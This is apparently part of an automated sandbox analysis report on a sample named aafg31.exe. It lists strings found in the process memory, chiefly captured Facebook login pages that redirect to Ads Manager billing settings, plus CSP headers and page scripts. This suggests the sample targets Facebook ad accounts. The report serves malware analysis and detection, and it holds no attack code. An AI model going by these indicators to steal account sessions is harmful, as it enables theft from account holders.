Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.meta.com/" title="Check out Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1YdDkScdA99k0UpE_m7A4RjlZGaZENHHpdW7Ll2nmUm_n8fEaFohaIosCFAPYSm-Mc-ndSajmkdmT0BSENF1516WSa3sR_0GXTJpXdA2fc04C03HO-vUUhtdtuEMW_lwzqsm9H8vX9avKgm60wDA" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/discover/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a
                Source: aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fadsmanager.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing%252F&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_EP9wX8qDDvu sx_0de3e6"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.meta.com/" title="Check out Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1zkQNodpydonjpZTJ2-JQcATQM63QJxgWWxqLH3BeMfgqOrKOXZJ-TRX4MoU-wuqFOn-PRgKK5KPdwt96F-9oMsY3W89Hi6cr-WzkCDAvkWavjXwSGsHqqBHbOAW5nwpdJzkTuIp3D4EdIglOkWQ" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/discover/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a
                Source: aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fadsmanager.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing%252F&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_EP9wX8qDDvu sx_0de3e6"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.meta.com/" title="Check out Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT38aVvRX8oz7yN4It2ePYXV6WVfbq05c2tY2wakcHbib83a0NcvuDZw3RDPXRHHRkYsm8NlCnJiweZMlMJLX-rVNpAEW3tJ1vBJyG9DEIJ_quiKdYYx0uanQ31fHl7ToLOvwkeu7-ZzHAWZkOFIbA" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/discover/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a
                Source: aafg31.exe, 00000015.00000002.618169870.000001E29018F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: +www.facebook.com equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvZNg","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmSHrY","isCQuick":false});</script><script nonce="su6L2Zt4">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="su6L2Zt4"></style><script nonce="su6L2Zt4">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 36 www.facebook.com.comG equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2901D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"6041888917634349990"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F",serverLID:"7238151353393430648"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","TRRzZOJtFfiLffYaKBZrZHu0",63072000000,"/",true,false,true,".facebook.com"]],["DeferredCookie","addToQueue",[],["_js_sb","TRRzZH3yz5rPlL6KEQlNk9hL",63072000000,"/",false,false,true,".facebook.com"]],["TransportSelectingClientSingletonConditional"],["RequireDeferredReference","unblock",[],[["TransportSelectingClientSingletonConditional"],"sd"]],["RequireDeferredReference","unblock",[],[["TransportSelectingClientSingletonConditional"],"css"]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoY6tY"}}},hblp:{consistency:{rev:1007577559},rsrcMap:{zPYlTyl:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyx equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="AWGLzne9">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvXGo","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmS9OI","isCQuick":false});</script><script nonce="AWGLzne9">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="AWGLzne9"></style><script nonce="AWGLzne9">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.643560384.000001E292292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="sjAjnDCw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvL80","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmStDY","isCQuick":false});</script><script nonce="sjAjnDCw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="sjAjnDCw"></style><script nonce="sjAjnDCw">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php? equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="sjAjnDCw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvL80","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmStDY","isCQuick":false});</script><script nonce="sjAjnDCw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="sjAjnDCw"></style><script nonce="sjAjnDCw">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="su6L2Zt4">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvZNg","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmSHrY","isCQuick":false});</script><script nonce="su6L2Zt4">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="su6L2Zt4"></style><script nonce="su6L2Zt4">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php? equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="su6L2Zt4">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvZNg","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmSHrY","isCQuick":false});</script><script nonce="su6L2Zt4">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="su6L2Zt4"></style><script nonce="su6L2Zt4">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?X equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="su6L2Zt4">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvZNg","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmSHrY","isCQuick":false});</script><script nonce="su6L2Zt4">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="su6L2Zt4"></style><script nonce="su6L2Zt4">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="v6hVXULl">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvdLY","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmSTo8","isCQuick":false});</script><script nonce="v6hVXULl">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="v6hVXULl"></style><script nonce="v6hVXULl">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2901D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: >ndsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa38964k_L9V5Vp-L9FMl9QcilWcbTzxa7P-tCC1TKg66e-UFn_IhnRAzkm8k9K0jUTcE8w5QCIPSkGsQGHj2KzFo2E"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa38964k_L9V5Vp-L9FMl9QcilWcbTzxa7P-tCC1TKg66e-UFn_IhnRAzkm8k9K0jUTcE8w5QCIPSkGsQGHj2KzFo2E"]},-1],["cr:5800",[],{__rc:[null,"Aa0PQSpSuKFzVuGWXpCDpbxb9-wT9v-J3lTAIwoa_QUNrS_WxfvOEoc8xxAanyhyA426AM3ENQeViYi2_DKjRXCzDrY"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClientSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1659080345,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"6041888917634349990"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F",serverLID:"7238151308987296342"}]],["FalcoLoggerTransports","attach",[],[]],["NavigationClickPointHandler"],["WebDevicePerfInfoLoggi6 equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.643560384.000001E292292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Alt-Svch3=":443"; ma=86400X-FB-Debug2KSYAd1WnQtaW97D5YdXSu/KFVQqUVPbOW6Fv8JVpTJ5VVP7tdpigSjxHIQ4gel1nMTD8YzpLqvYX0UbB8U2jQ==origin-agent-cluster?0X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonepermissions-policyaccelerometer=(), ambient-light-sensor=(), bluetooth=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), midi=(), screen-wake-lock=(), serial=(), usb=()document-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri 